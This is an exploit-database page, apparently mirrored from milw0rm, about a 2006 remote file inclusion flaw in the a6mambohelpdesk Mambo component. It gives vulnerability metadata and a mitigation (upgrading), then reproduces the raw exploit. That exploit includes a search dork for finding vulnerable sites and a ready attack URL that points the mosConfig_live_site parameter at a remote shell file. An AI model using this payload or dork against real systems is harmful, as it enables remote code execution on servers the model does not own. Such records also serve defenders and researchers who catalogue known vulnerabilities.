header-logo
Suggest Exploit
vendor:
a6mambohelpdesk Mambo Component
by:
Dr.Jr7
7,5
CVSS
HIGH
Remote Include Vulnerability
98
CWE
Product Name: a6mambohelpdesk Mambo Component
Affected Version From: <= 18RC1
Affected Version To: <= 18RC1
Patch Exists: YES
Related CWE: N/A
CPE: a:mambo:a6mambohelpdesk_mambo_component
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability

This vulnerability allows remote attackers to include arbitrary files from local resources. The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'mosConfig_live_site' parameter in 'admin.a6mambohelpdesk.php' script. A remote attacker can send a specially crafted HTTP request with arbitrary file inclusion, which will be included and executed by the vulnerable script.

Mitigation:

Upgrade to the latest version of a6mambohelpdesk Mambo Component
Source

Exploit-DB raw data:

a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability

# Rish : High
# Class : Remote
# Script : a6mambohelpdesk
# Thanx : www.lezr.com/vb

# codes

<?
include("$mosConfig_live_site/components/com_a6mambohelpdesk/about.html" );
?>

# d0rkiz : allinurl:"com_a6mambohelpdesk"

http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt


# by Dr.Jr7

# milw0rm.com [2006-07-27]

Navigation

Suggest Exploit

Services By CQR